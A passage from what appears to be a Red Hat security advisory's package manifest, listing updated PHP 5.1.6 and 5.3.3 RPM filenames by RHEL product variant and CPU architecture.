php-ncurses-5.1.6-40.el5_9.1.ia64.rpm
php-odbc-5.1.6-40.el5_9.1.ia64.rpm
php-pdo-5.1.6-40.el5_9.1.ia64.rpm
php-pgsql-5.1.6-40.el5_9.1.ia64.rpm
php-snmp-5.1.6-40.el5_9.1.ia64.rpm
php-soap-5.1.6-40.el5_9.1.ia64.rpm
php-xml-5.1.6-40.el5_9.1.ia64.rpm
php-xmlrpc-5.1.6-40.el5_9.1.ia64.rpm
ppc:
php-5.1.6-40.el5_9.1.ppc.rpm
php-bcmath-5.1.6-40.el5_9.1.ppc.rpm
php-cli-5.1.6-40.el5_9.1.ppc.rpm
php-common-5.1.6-40.el5_9.1.ppc.rpm
php-dba-5.1.6-40.el5_9.1.ppc.rpm
php-debuginfo-5.1.6-40.el5_9.1.ppc.rpm
php-devel-5.1.6-40.el5_9.1.ppc.rpm
php-gd-5.1.6-40.el5_9.1.ppc.rpm
php-imap-5.1.6-40.el5_9.1.ppc.rpm
php-ldap-5.1.6-40.el5_9.1.ppc.rpm
php-mbstring-5.1.6-40.el5_9.1.ppc.rpm
php-mysql-5.1.6-40.el5_9.1.ppc.rpm
php-ncurses-5.1.6-40.el5_9.1.ppc.rpm
php-odbc-5.1.6-40.el5_9.1.ppc.rpm
php-pdo-5.1.6-40.el5_9.1.ppc.rpm
php-pgsql-5.1.6-40.el5_9.1.ppc.rpm
php-snmp-5.1.6-40.el5_9.1.ppc.rpm
php-soap-5.1.6-40.el5_9.1.ppc.rpm
php-xml-5.1.6-40.el5_9.1.ppc.rpm
php-xmlrpc-5.1.6-40.el5_9.1.ppc.rpm
s390x:
php-5.1.6-40.el5_9.1.s390x.rpm
php-bcmath-5.1.6-40.el5_9.1.s390x.rpm
php-cli-5.1.6-40.el5_9.1.s390x.rpm
php-common-5.1.6-40.el5_9.1.s390x.rpm
php-dba-5.1.6-40.el5_9.1.s390x.rpm
php-debuginfo-5.1.6-40.el5_9.1.s390x.rpm
php-devel-5.1.6-40.el5_9.1.s390x.rpm
php-gd-5.1.6-40.el5_9.1.s390x.rpm
php-imap-5.1.6-40.el5_9.1.s390x.rpm
php-ldap-5.1.6-40.el5_9.1.s390x.rpm
php-mbstring-5.1.6-40.el5_9.1.s390x.rpm
php-mysql-5.1.6-40.el5_9.1.s390x.rpm
php-ncurses-5.1.6-40.el5_9.1.s390x.rpm
php-odbc-5.1.6-40.el5_9.1.s390x.rpm
php-pdo-5.1.6-40.el5_9.1.s390x.rpm
php-pgsql-5.1.6-40.el5_9.1.s390x.rpm
php-snmp-5.1.6-40.el5_9.1.s390x.rpm
php-soap-5.1.6-40.el5_9.1.s390x.rpm
php-xml-5.1.6-40.el5_9.1.s390x.rpm
php-xmlrpc-5.1.6-40.el5_9.1.s390x.rpm
x86_64:
php-5.1.6-40.el5_9.1.x86_64.rpm
php-bcmath-5.1.6-40.el5_9.1.x86_64.rpm
php-cli-5.1.6-40.el5_9.1.x86_64.rpm
php-common-5.1.6-40.el5_9.1.x86_64.rpm
php-dba-5.1.6-40.el5_9.1.x86_64.rpm
php-debuginfo-5.1.6-40.el5_9.1.x86_64.rpm
php-devel-5.1.6-40.el5_9.1.x86_64.rpm
php-gd-5.1.6-40.el5_9.1.x86_64.rpm
php-imap-5.1.6-40.el5_9.1.x86_64.rpm
php-ldap-5.1.6-40.el5_9.1.x86_64.rpm
php-mbstring-5.1.6-40.el5_9.1.x86_64.rpm
php-mysql-5.1.6-40.el5_9.1.x86_64.rpm
php-ncurses-5.1.6-40.el5_9.1.x86_64.rpm
php-odbc-5.1.6-40.el5_9.1.x86_64.rpm
php-pdo-5.1.6-40.el5_9.1.x86_64.rpm
php-pgsql-5.1.6-40.el5_9.1.x86_64.rpm
php-snmp-5.1.6-40.el5_9.1.x86_64.rpm
php-soap-5.1.6-40.el5_9.1.x86_64.rpm
php-xml-5.1.6-40.el5_9.1.x86_64.rpm
php-xmlrpc-5.1.6-40.el5_9.1.x86_64.rpm
Red Hat Enterprise Linux Compute Node EUS (v. 6.2):
Source:
php-5.3.3-3.el6_2.11.src.rpm
x86_64:
php-cli-5.3.3-3.el6_2.11.x86_64.rpm
php-common-5.3.3-3.el6_2.11.x86_64.rpm
php-debuginfo-5.3.3-3.el6_2.11.x86_64.rpm
Red Hat Enterprise Linux Compute Node EUS (v. 6.3):
Source:
php-5.3.3-14.el6_3.3.src.rpm
x86_64:
php-cli-5.3.3-14.el6_3.3.x86_64.rpm
php-common-5.3.3-14.el6_3.3.x86_64.rpm
php-debuginfo-5.3.3-14.el6_3.3.x86_64.rpm
Red Hat Enterprise Linux HPC Node EUS (v. 6.4):
Source:
php-5.3.3-23.el6_4.1.src.rpm
x86_64:
php-cli-5.3.3-23.el6_4.1.x86_64.rpm
php-common-5.3.3-23.el6_4.1.x86_64.rpm
php-debuginfo-5.3.3-23.el6_4.1.x86_64.rpm
Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.2):
Source:
php-5.3.3-3.el6_2.11.src.rpm
x86_64:
php-5.3.3-3.el6_2.11.x86_64.rpm
php-bcmath-5.3.3-3.el6_2.11.x86_64.rpm
php-dba-5.3.3-3.el6_2.11.x86_64.rpm
php-debuginfo-5.3.3-3.el6_2.11.x86_64.rpm
php-devel-5.3.3-3.el6_2.11.x86_64.rpm
php-embedded-5.3.3-3.el6_2.11.x86_64.rpm
php-enchant-5.3.3-3.el6_2.11.x86_64.rpm
php-gd-5.3.3-3.el6_2.11.x86_64.rpm
php-imap-5.3.3-3.el6_2.11.x86_64.rpm
php-intl-5.3.3-3.el6_2.11.x86_64.rpm
php-ldap-5.3.3-3.el6_2.11.x86_64.rpm
php-mbstring-5.3.3-3.el6_2.11.x86_64.rpm
php-mysql-5.3.3-3.el6_2.11.x86_64.rpm
php-odbc-5.3.3-3.el6_2.11.x86_64.rpm
php-pdo-5.3.3-3.el6_2.11.x86_64.rpm
php-pgsql-5.3.3-3.el6_2.11.x86_64.rpm
php-process-5.3.3-3.el6_2.11.x86_64.rpm
php-pspell-5.3.3-3.el6_2.11.x86_64.rpm
php-recode-5.3.3-3.el6_2.11.x86_64.rpm
php-snmp-5.3.3-3.el6_2.11.x86_64.rpm
php-soap-5.3.3-3.el6_2.11.x86_64.rpm
php-tidy-5.3.3-3.el6_2.11.x86_64.rpm
php-xml-5.3.3-3.el6_2.11.x86_64.rpm
php-xmlrpc-5.3.3-3.el6_2.11.x86_64.rpm
php-zts-5.3.3-3.el6_2.11.x86_64.rpm
Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.3) :
Source:
php-5.3.3-14.el6_3.3.src.rpm
x86_64:
php-5.3.3-14.el6_3.3.x86_64.rpm
php-bcmath-5.3.3-14.el6_3.3.x86_64.rpm
php-dba-5.3.3-14.el6_3.3.x86_64.rpm
php-debuginfo-5.3.3-14.el6_3.3.x86_64.rpm
php-devel-5.3.3-14.el6_3.3.x86_64.rpm
php-embedded-5.3.3-14.el6_3.3.x86_64.rpm
php-enchant-5.3.3-14.el6_3.3.x86_64.rpm
php-gd-5.3.3-14.el6_3.3.x86_64.rpm
php-imap-5.3.3-14.el6_3.3.x86_64.rpm
php-intl-5.3.3-14.el6_3.3.x86_64.rpm
php-ldap-5.3.3-14.el6_3.3.x86_64.rpm
php-mbstring-5.3.3-14.el6_3.3.x86_64.rpm
php-mysql-5.3.3-14.el6_3.3.x86_64.rpm
php-odbc-5.3.3-14.el6_3.3.x86_64.rpm
php-pdo-5.3.3-14.el6_3.3.x86_64.rpm
php-pgsql-5.3.3-14.el6_3.3.x86_64.rpm
php-process-5.3.3-14.el6_3.3.x86_64.rpm
php-pspell-5.3.3-14.el6_3.3.x86_64.rpm
php-recode-5.3.3-14.el6_3.3.x86_64.rpm
php-snmp-5.3.3-14.el6_3.3.x86_64.rpm
php-soap-5.3.3-14.el6_3.3.x86_64.rpm
php-tidy-5.3.3-14.el6_3.3.x86_64.rpm
php-xml-5.3.3-14.el6_3.3.x86_64.rpm
php-xmlrpc-5.3.3-14.el6_3.3.x86_64.rpm
php-zts-5.3.3-14.el6_3.3.x86_64.rpm
Red Hat Enterprise Linux Compute Node Optional EUS (v. 6.4):
Source:
php-5.3.3-23.el6_4.1.src.rpm
x86_64:
php-5.3.3-23.el6_4.1.x86_64.rpm
php-bcmath-5.3.3-23.el6_4.1.x86_64.rpm
php-dba-5.3.3-23.el6_4.1.x86_64.rpm
php-debuginfo-5.3.3-23.el6_4.1.x86_64.rpm
php-devel-5.3.3-23.el6_4.1.x86_64.rpm
php-embedded-5.3.3-23.el6_4.1.x86_64.rpm
php-enchant-5.3.3-23.el6_4.1.x86_64.rpm
php-fpm-5.3.3-23.el6_4.1.x86_64.rpm
php-gd-5.3.3-23.el6_4.1.x86_64.rpm
php-imap-5.3.3-23.el6_4.1.x86_64.rpm
php-intl-5.3.3-23.el6_4.1.x86_64.rpm
php-ldap-5.3.3-23.el6_4.1.x86_64.rpm
php-mbstring-5.3.3-23.el6_4.1.x86_64.rpm
php-mysql-5.3.3-23.el6_4.1.x86_64.rpm
php-odbc-5.3.3-23.el6_4.1.x86_64.rpm
php-pdo-5.3.3-23.el6_4.1.x86_64.rpm
php-pgsql-5.3.3-23.el6_4.1.x86_64.rpm
php-process-5.3.3-23.el6_4.1.x86_64.rpm
php-pspell-5.3.3-23.el6_4.1.x86_64.rpm
php-recode-5.3.3-23.el6_4.1.x86_64.rpm
php-snmp-5.3.3-23.el6_4.1.x86_64.rpm
php-soap-5.3.3-23.el6_4.1.x86_64.rpm
php-tidy-5.3.3-23.el6_4.1.x86_64.rpm
php-xml-5.3.3-23.el6_4.1.x86_64.rpm
php-xmlrpc-5.3.3-23.el6_4.1.x86_64.rpm
php-zts-5.3.3-23.el6_4.1.x86_64.rpm
Red Hat Enterprise Linux Server EUS (v. 6.2):
Source:
php-5.3.3-3.el6_2.11.src.rpm
i386:
php-5.3.3-3.el6_2.11.i686.rpm
php-cli-5.3.3-3.el6_2.11.i686.rpm
php-common-5.3.3-3.el6_2.11.i686.rpm
php-debuginfo-5.3.3-3.el6_2.11.i686.rpm
php-gd-5.3.3-3.el6_2.11.i686.rpm
php-ldap-5.3.3-3.el6_2.11.i686.rpm
php-mysql-5.3.3-3.el6_2.11.i686.rpm
php-odbc-5.3.3-3.el6_2.11.i686.rpm
php-pdo-5.3.3-3.el6_2.11.i686.rpm
php-pgsql-5.3.3-3.el6_2.11.i686.rpm
php-soap-5.3.3-3.el6_2.11.i686.rpm
php-xml-5.3.3-3.el6_2.11.i686.rpm
php-xmlrpc-5.3.3-3.el6_2.11.i686.rpm
ppc64:
php-5.3.3-3.el6_2.11.ppc64.rpm
php-cli-5.3.3-3.el6_2.11.ppc64.rpm
php-common-5.3.3-3.el6_2.11.ppc64.rpm
php-debuginfo-5.3.3-3.el6_2.11.ppc64.rpm
php-gd-5.3.3-3.el6_2.11.ppc64.rpm
php-ldap-5.3.3-3.el6_2.11.ppc64.rpm
php-mysql-5.3.3-3.el6_2.11.ppc64.rpm
php-odbc-5.3.3-3.el6_2.11.ppc64.rpm
php-pdo-5.3.3-3.el6_2.11.ppc64.rpm
php-pgsql-5.3.3-3.el6_2.11.ppc64.rpm
php-soap-5.3.3-3.el6_2.11.ppc64.rpm
php-xml-5.3.3-3.el6_2.11.ppc64.rpm
php-xmlrpc-5.3.3-3.el6_2.11.ppc64.rpm
s390x:
php-5.3.3-3.el6_2.11.s390x.rpm
php-cli-5.3.3-3.el6_2.11.s390x.rpm
php-common-5.3.3-3.el6_2.11.s390x.rpm
php-debuginfo-5.3.3-3.el6_2.11.s390x.rpm
php-gd-5.3.3-3.el6_2.11.s390x.rpm
php-ldap-5.3.3-3.el6_2.11.s390x.rpm
php-mysql-5.3.3-3.el6_2.11.s390x.rpm
php-odbc-5.3.3-3.el6_2.11.s390x.rpm
php-pdo-5.3.3-3.el6_2.11.s390x.rpm
php-pgsql-5.3.3-3.el6_2.11.s390x.rpm
php-soap-5.3.3-3.el6_2.11.s390x.rpm
php-xml-5.3.3-3.el6_2.11.s390x.rpm
php-xmlrpc-5.3.3-3.el6_2.11.s390x.rpm
x86_64:
php-5.3.3-3.el6_2.11.x86_64.rpm
php-cli-5.3.3-3.el6_2.11.x86_64.rpm
php-common-5.3.3-3.el6_2.11.x86_64.rpm
php-debuginfo-5.3.3-3.el6_2.11.x86_64.rpm
php-gd-5.3.3-3.el6_2.11.x86_64.rpm
php-ldap-5.3.3-3.el6_2.11.x86_64.rpm
php-mysql-5.3.3-3.el6_2.11.x86_64.rpm
php-odbc-5.3.3-3.el6_2.11.x86_64.rpm
php-pdo-5.3.3-3.el6_2.11.x86_64.rpm
php-pgsql-5.3.3-3.el6_2.11.x86_64.rpm
php-soap-5.3.3-3.el6_2.11.x86_64.rpm
php-xml-5.3.3-3.el6_2.11.x86_64.rpm
php-xmlrpc-5.3.3-3.el6_2.11.x86_64.rpm
Red Hat Enterprise Linux Server EUS (v. 6.3):
Source:
php-5.3.3-14.el6_3.3.src.rpm
i386:
php-5.3.3-14.el6_3.3.i686.rpm
php-cli-5.3.3-14.el6_3.3.i686.rpm
php-common-5.3.3-14.el6_3.3.i686.rpm
php-debuginfo-5.3.3-14.el6_3.3.i686.rpm
php-gd-5.3.3-14.el6_3.3.i686.rpm
php-ldap-5.3.3-14.el6_3.3.i686.rpm
php-mysql-5.3.3-14.el6_3.3.i686.rpm
php-odbc-5.3.3-14.el6_3.3.i686.rpm
php-pdo-5.3.3-14.el6_3.3.i686.rpm
php-pgsql-5.3.3-14.el6_3.3.i686.rpm
php-soap-5.3.3-14.el6_3.3.i686.rpm
php-xml-5.3.3-14.el6_3.3.i686.rpm
php-xmlrpc-5.3.3-14.el6_3.3.i686.rpm
ppc64:
php-5.3.3-14.el6_3.3.ppc64.rpm
php-cli-5.3.3-14.el6_3.3.ppc64.rpm
php-common-5.3.3-14.el6_3.3.ppc64.rpm
php-debuginfo-5.3.3-14.el6_3.3.ppc64.rpm
php-gd-5.3.3-14.el6_3.3.ppc64.rpm
php-ldap-5.3.3-14.el6_3.3.ppc64.rpm
php-mysql-5.3.3-14.el6_3.3.ppc64.rpm
php-odbc-5.3.3-14.el6_3.3.ppc64.rpm
php-pdo-5.3.3-14.el6_3.3.ppc64.rpm
php-pgsql-5.3.3-14.el6_3.3.ppc64.rpm
php-soap-5.3.3-14.el6_3.3.ppc64.rpm
php-xml-5.3.3-14.el6_3.3.ppc64.rpm
php-xmlrpc-5.3.3-14.el6_3.3.ppc64.rpm
s390x:
php-5.3.3-14.el6_3.3.s390x.rpm
php-cli-5.3.3-14.el6_3.3.s390x.rpm
php-common-5.3.3-14.el6_3.3.s390x.rpm
php-debuginfo-5.3.3-14.el6_3.3.s390x.rpm
php-gd-5.3.3-14.el6_3.3.s390x.rpm
php-ldap-5.3.3-14.el6_3.3.s390x.rpm
php-mysql-5.3.3-14.el6_3.3.s390x.rpm
php-odbc-5.3.3-14.el6_3.3.s390x.rpm
php-pdo-5.3.3-14.el6_3.3.s390x.rpm
php-pgsql-5.3.3-14.el6_3.3.s390x.rpm
php-soap-5.3.3-14.el6_3.3.s390x.rpm
php-xml-5.3.3-14.el6_3.3.s390x.rpm
php-xmlrpc-5.3.3-14.el6_3.3.s390x.rpm
x86_64:
php-5.3.3-14.el6_3.3.x86_64.rpm
php-cli-5.3.3-14.el6_3.3.x86_64.rpm
php-common-5.3.3-14.el6_3.3.x86_64.rpm
php-debuginfo-5.3.3-14.el6_3.3.x86_64.rpm
php-gd-5.3.3-14.el6_3.3.x86_64.rpm
php-ldap-5.3.3-14.el6_3.3.x86_64.rpm
php-mysql-5.3.3-14.el6_3.3.x86_64.rpm
php-odbc-5.3.3-14.el6_3.3.x86_64.rpm
php-pdo-5.3.3-14.el6_3.3.x86_64.rpm
php-pgsql-5.3.3-14.el6_3.3.x86_64.rpm
php-soap-5.3.3-14.el6_3.3.x86_64.rpm
php-xml-5.3.3-14.el6_3.3.x86_64.rpm
php-xmlrpc-5.3.3-14.el6_3.3.x86_64.rpm
Red Hat Enterprise Linux Server EUS (v. 6.4):
Source:
php-5.3.3-23.el6_4.1.src.rpm
i386:
php-5.3.3-23.el6_4.1.i686.rpm
php-cli-5.3.3-23.el6_4.1.i686.rpm
php-common-5.3.3-23.el6_4.1.i686.rpm
php-debuginfo-5.3.3-23.el6_4.1.i686.rpm
php-gd-5.3.3-23.el6_4.1.i686.rpm
php-ldap-5.3.3-23.el6_4.1.i686.rpm
php-mysql-5.3.3-23.el6_4.1.i686.rpm
php-odbc-5.3.3-23.el6_4.1.i686.rpm
php-pdo-5.3.3-23.el6_4.1.i686.rpm
php-pgsql-5.3.3-23.el6_4.1.i686.rpm
php-soap-5.3.3-23.el6_4.1.i686.rpm
php-xml-5.3.3-23.el6_4.1.i686.rpm
php-xmlrpc-5.3.3-23.el6_4.1.i686.rpm
ppc64:
php-5.3.3-23.el6_4.1.ppc64.rpm
php-cli-5.3.3-23.el6_4.1.ppc64.rpm
php-common-5.3.3-23.el6_4.1.ppc64.rpm
php-debuginfo-5.3.3-23.el6_4.1.ppc64.rpm
php-gd-5.3.3-23.el6_4.1.ppc64.rpm
php-ldap-5.3.3-23.el6_4.1.ppc64.rpm
php-mysql-5.3.3-23.el6_4.1.ppc64.rpm
php-odbc-5.3.3-23.el6_4.1.ppc64.rpm
php-pdo-5.3.3-23.el6_4.1.ppc64.rpm
php-pgsql-5.3.3-23.el6_4.1.ppc64.rpm
php-soap-5.3.3-23.el6_4.1.ppc64.rpm
php-xml-5.3.3-23.el6_4.1.ppc64.rpm
php-xmlrpc-5.3.3-23.el6_4.1.ppc64.rpm
s390x:
php-5.3.3-23.el6_4.1.s390x.rpm
php-cli-5.3.3-23.el6_4.1.s390x.rpm
php-common-5.3.3-23.el6_4.1.s390x.rpm
php-debuginfo-5.3.3-23.el6_4.1.s390x.rpm
php-gd-5.3.3-23.el6_4.1.s390x.rpm
php-ldap-5.3.3-23.el6_4.1.s390x.rpm
php-mysql-5.3.3-23.el6_4.1.s390x.rpm
php-odbc-5.3.3-23.el6_4.1.s390x.rpm
php-pdo-5.3.3-23.el6_4.1.s390x.rpm
php-pgsql-5.3.3-23.el6_4.1.s390x.rpm
php-soap-5.3.3-23.el6_4.1.s390x.rpm
php-xml-5.3.3-23.el6_4.1.s390x.rpm
php-xmlrpc-5.3.3-23.el6_4.1.s390x.rpm
x86_64:
php-5.3.3-23.el6_4.1.x86_64.rpm
php-cli-5.3.3-23.el6_4.1.x86_64.rpm
php-common-5.3.3-23.el6_4.1.x86_64.rpm
php-debuginfo-5.3.3-23.el6_4.1.x86_64.rpm
php-gd-5.3.3-23.el6_4.1.x86_64.rpm
php-ldap-5.3.3-23.el6_4.1.x86_64.rpm
php-mysql-5.3.3-23.el6_4.1.x86_64.rpm
php-odbc-5.3.3-23.el6_4.1.x86_64.rpm
php-pdo-5.3.3-23.el6_4.1.x86_64.rpm
php-pgsql-5.3.3-23.el6_4.1.x86_64.rpm
php-soap-5.3.3-23.el6_4.1.x86_64.rpm
php-xml-5.3.3-23.el6_4.1.x86_64.rpm
php-xmlrpc-5.3.3-23.el6_4.1.x86_64.rpm
Red Hat Enterprise Linux Server Optional EUS (v. 6.2):
Source:
php-5.3.3-3.el6_2.11.src.rpm
i386:
php-bcmath-5.3.3-3.el6_2.11.i686.rpm
php-dba-5.3.3-3.el6_2.11.i686.rpm
php-debuginfo-5.3.3-3.el6_2.11.i686.rpm
php-devel-5.3.3-3.el6_2.11.i686.rpm
php-embedded-5.3.3-3.el6_2.11.i686.rpm
php-enchant-5.3.3-3.el6_2.11.i686.rpm
php-imap-5.3.3-3.el6_2.11.i686.rpm
php-intl-5.3.3-3.el6_2.11.i686.rpm
php-mbstring-5.3.3-3.el6_2.11.i686.rpm
php-process-5.3.3-3.el6_2.11.i686.rpm
php-pspell-5.3.3-3.el6_2.11.i686.rpm
php-recode-5.3.3-3.el6_2.11.i686.rpm
php-snmp-5.3.3-3.el6_2.11.i686.rpm
php-tidy-5.3.3-3.el6_2.11.i686.rpm
php-zts-5.3.3-3.el6_2.11.i686.rpm
ppc64:
php-bcmath-5.3.3-3.el6_2.11.ppc64.rpm
php-dba-5.3.3-3.el6_2.11.ppc64.rpm
php-debuginfo-5.3.3-3.el6_2.11.ppc64.rpm
php-devel-5.3.3-3.el6_2.11.ppc64.rpm
php-embedded-5.3.3-3.el6_2.11.ppc64.rpm
php-enchant-5.3.3-3.el6_2.11.ppc64.rpm
php-imap-5.3.3-3.el6_2.11.ppc64.rpm
php-intl-5.3.3-3.el6_2.11.ppc64.rpm
php-mbstring-5.3.3-3.el6_2.11.ppc64.rpm
php-process-5.3.3-3.el6_2.11.ppc64.rpm
php-pspell-5.3.3-3.el6_2.11.ppc64.rpm
php-recode-5.3.3-3.el6_2.11.ppc64.rpm
php-snmp-5.3.3-3.el6_2.11.ppc64.rpm
php-tidy-5.3.3-3.el6_2.11.ppc64.rpm
php-zts-5.3.3-3.el6_2.11.ppc64.rpm
s390x:
php-bcmath-5.3.3-3.el6_2.11.s390x.rpm
php-dba-5.3.3-3.el6_2.11.s390x.rpm
php-debuginfo-5.3.3-3.el6_2.11.s390x.rpm
php-devel-5.3.3-3.el6_2.11.s390x.rpm
php-embedded-5.3.3-3.el6_2.11.s390x.rpm
php-enchant-5.3.3-3.el6_2.11.s390x.rpm
php-imap-5.3.3-3.el6_2.11.s390x.rpm
php-intl-5.3.3-3.el6_2.11.s390x.rpm
php-mbstring-5.3.3-3.el6_2.11.s390x.rpm
php-process-5.3.3-3.el6_2.11.s390x.rpm
php-pspell-5.3.3-3.el6_2.11.s390x.rpm
php-recode-5.3.3-3.el6_2.11.s390x.rpm
php-snmp-5.3.3-3.el6_2.11.s390x.rpm
php-tidy-5.3.3-3.el6_2.11.s390x.rpm
php-zts-5.3.3-3.el6_2.11.s390x.rpm
x86_64:
php-bcmath-5.3.3-3.el6_2.11.x86_64.rpm
php-dba-5.3.3-3.el6_2.11.x86_64.rpm
php-debuginfo-5.3.3-3.el6_2.11.x86_64.rpm
php-devel-5.3.3-3.el6_2.11.x86_64.rpm
php-embedded-5.3.3-3.el6_2.11.x86_64.rpm
php-enchant-5.3.3-3.el6_2.11.x86_64.rpm
php-imap-5.3.3-3.el6_2.11.x86_64.rpm
php-intl-5.3.3-3.el6_2.11.x86_64.rpm
php-mbstring-5.3.3-3.el6_2.11.x86_64.rpm
php-process-5.3.3-3.el6_2.11.x86_64.rpm
php-pspell-5.3.3-3.el6_2.11.x86_64.rpm
php-recode-5.3.3-3.el6_2.11.x86_64.rpm
php-snmp-5.3.3-3.el6_2.11.x86_64.rpm
php-tidy-5.3.3-3.el6_2.11.x86_64.rpm
php-zts-5.3.3-3.el6_2.11.x86_64.rpm
Red Hat Enterprise Linux Server Optional EUS (v. 6.3):
Source:
php-5.3.3-14.el6_3.3.src.rpm
i386:
php-bcmath-5.3.3-14.el6_3.3.i686.rpm
php-dba-5.3.3-14.el6_3.3.i686.rpm
php-debuginfo-5.3.3-14.el6_3.3.i686.rpm
php-devel-5.3.3-14.el6_3.3.i686.rpm
php-embedded-5.3.3-14.el6_3.3.i686.rpm
php-enchant-5.3.3-14.el6_3.3.i686.rpm
php-imap-5.3.3-14.el6_3.3.i686.rpm
php-intl-5.3.3-14.el6_3.3.i686.rpm
php-mbstring-5.3.3-14.el6_3.3.i686.rpm
php-process-5.3.3-14.el6_3.3.i686.rpm
php-pspell-5.3.3-14.el6_3.3.i686.rpm
php-recode-5.3.3-14.el6_3.3.i686.rpm
php-snmp-5.3.3-14.el6_3.3.i686.rpm
php-tidy-5.3.3-14.el6_3.3.i686.rpm
php-zts-5.3.3-14.el6_3.3.i686.rpm
ppc64:
php-bcmath-5.3.3-14.el6_3.3.ppc64.rpm
php-dba-5.3.3-14.el6_3.3.ppc64.rpm
php-debuginfo-5.3.3-14.el6_3.3.ppc64.rpm
php-devel-5.3.3-14.el6_3.3.ppc64.rpm
php-embedded-5.3.3-14.el6_3.3.ppc64.rpm
php-enchant-5.3.3-14.el6_3.3.ppc64.rpm
php-imap-5.3.3-14.el6_3.3.ppc64.rpm
php-intl-5.3.3-14.el6_3.3.ppc64.rpm
php-mbstring-5.3.3-14.el6_3.3.ppc64.rpm
php-process-5.3.3-14.el6_3.3.ppc64.rpm
php-pspell-5.3.3-14.el6_3.3.ppc64.rpm
php-recode-5.3.3-14.el6_3.3.ppc64.rpm
php-snmp-5.3.3-14.el6_3.3.ppc64.rpm
php-tidy-5.3.3-14.el6_3.3.ppc64.rpm
php-zts-5.3.3-14.el6_3.3.ppc64.rpm
s390x:
php-bcmath-5.3.3-14.el6_3.3.s390x.rpm
php-dba-5.3.3-14.el6_3.3.s390x.rpm
php-debuginfo-5.3.3-14.el6_3.3.s390x.rpm
php-devel-5.3.3-14.el6_3.3.s390x.rpm
php-embedded-5.3.3-14.el6_3.3.s390x.rpm
php-enchant-5.3.3-14.el6_3.3.s390x.rpm
php-imap-5.3.3-14.el6_3.3.s390x.rpm
php-intl-5.3.3-14.el6_3.3.s390x.rpm
php-mbstring-5.3.3-14.el6_3.3.s390x.rpm
php-process-5.3.3-14.el6_3.3.s390x.rpm
php-pspell-5.3.3-14.el6_3.3.s390x.rpm
php-recode-5.3.3-14.el6_3.3.s390x.rpm
php-snmp-5.3.3-14.el6_3.3.s390x.rpm
php-tidy-5.3.3-14.el6_3.3.s390x.rpm
php-zts-5.3.3-14.el6_3.3.s390x.rpm
x86_64:
php-bcmath-5.3.3-14.el6_3.3.x86_64.rpm
php-dba-5.3.3-14.el6_3.3.x86_64.rpm
php-debuginfo-5.3.3-14.el6_3.3.x86_64.rpm
php-devel-5.3.3-14.el6_3.3.x86_64.rpm
php-embedded-5.3.3-14.el6_3.3.x86_64.rpm
php-enchant-5.3.3-14.el6_3.3.x86_64.rpm
php-imap-5.3.3-14.el6_3.3.x86_64.rpm
php-intl-5.3.3-14.el6_3.3.x86_64.rpm
php-mbstring-5.3.3-14.el6_3.3.x86_64.rpm
php-process-5.3.3-14.el6_3.3.x86_64.rpm
php-pspell-5.3.3-14.el6_3.3.x86_64.rpm
php-recode-5.3.3-14.el6_3.3.x86_64.rpm
php-snmp-5.3.3-14.el6_3.3.x86_64.rpm
php-tidy-5.3.3-14.el6_3.3.x86_64.rpm
php-zts-5.3.3-14.el6_3.3.x86_64.rpm
Red Hat Enterprise Linux Server Optional EUS (v. 6.4):
Source:
php-5.3.3-23.el6_4.1.src.rpm
i386:
php-bcmath-5.3.3-23.el6_4.1.i686.rpm
php-dba-5.3.3-23.el6_4.1.i686.rpm
php-debuginfo-5.3.3-23.el6_4.1.i686.rpm
php-devel-5.3.3-23.el6_4.1.i686.rpm
php-embedded-5.3.3-23.el6_4.1.i686.rpm
php-enchant-5.3.3-23.el6_4.1.i686.rpm
php-fpm-5.3.3-23.el6_4.1.i686.rpm
php-imap-5.3.3-23.el6_4.1.i686.rpm
php-intl-5.3.3-23.el6_4.1.i686.rpm
php-mbstring-5.3.3-23.el6_4.1.i686.rpm
php-process-5.3.3-23.el6_4.1.i686.rpm
php-pspell-5.3.3-23.el6_4.1.i686.rpm
php-recode-5.3.3-23.el6_4.1.i686.rpm
php-snmp-5.3.3-23.el6_4.1.i686.rpm
php-tidy-5.3.3-23.el6_4.1.i686.rpm
php-zts-5.3.3-23.el6_4.1.i686.rpm
ppc64:
php-bcmath-5.3.3-23.el6_4.1.ppc64.rpm
php-dba-5.3.3-23.el6_4.1.ppc64.rpm
php-debuginfo-5.3.3-23.el6_4.1.ppc64.rpm
php-devel-5.3.3-23.el6_4.1.ppc64.rpm
php-embedded-5.3.3-23.el6_4.1.ppc64.rpm
php-enchant-5.3.3-23.el6_4.1.ppc64.rpm
php-fpm-5.3.3-23.el6_4.1.ppc64.rpm
php-imap-5.3.3-23.el6_4.1.ppc64.rpm
php-intl-5.3.3-23.el6_4.1.ppc64.rpm
php-mbstring-5.3.3-23.el6_4.1.ppc64.rpm
php-process-5.3.3-23.el6_4.1.ppc64.rpm
php-pspell-5.3.3-23.el6_4.1.ppc64.rpm
php-recode-5.3.3-23.el6_4.1.ppc64.rpm
php-snmp-5.3.3-23.el6_4.1.ppc64.rpm
php-tidy-5.3.3-23.el6_4.1.ppc64.rpm
php-zts-5.3.3-23.el6_4.1.ppc64.rpm
s390x:
php-bcmath-5.3.3-23.el6_4.1.s390x.rpm
php-dba-5.3.3-23.el6_4.1.s390x.rpm
php-debuginfo-5.3.3-23.el6_4.1.s390x.rpm
php-devel-5.3.3-23.el6_4.1.s390x.rpm
php-embedded-5.3.3-23.el6_4.1.s390x.rpm
php-enchant-5.3.3-23.el6_4.1.s390x.rpm
php-fpm-5.3.3-23.el6_4.1.s390x.rpm
php-imap-5.3.3-23.el6_4.1.s390x.rpm
php-intl-5.3.3-23.el6_4.1.s390x.rpm
php-mbstring-5.3.3-23.el6_4.1.s390x.rpm
php-process-5.3.3-23.el6_4.1.s390x.rpm
php-pspell-5.3.3-23.el6_4.1.s390x.rpm
php-recode-5.3.3-23.el6_4.1.s390x.rpm
php-snmp-5.3.3-23.el6_4.1.s390x.rpm
php-tidy-5.3.3-23.el6_4.1.s390x.rpm
php-zts-5.3.3-23.el6_4.1.s390x.rpm
x86_64:
php-bcmath-5.3.3-23.el6_4.1.x86_64.rpm
php-dba-5.3.3-23.el6_4.1.x86_64.rpm
php-debuginfo-5.3.3-23.el6_4.1.x86_64.rpm
php-devel-5.3.3-23.el6_4.1.x86_64.rpm
php-embedded-5.3.3-23.el6_4.1.x86_64.rpm
php-enchant-5.3.3-23.el6_4.1.x86_64.rpm
php-fpm-5.3.3-23.el6_4.1.x86_64.rpm
php-imap-5.3.3-23.el6_4.1.x86_64.rpm
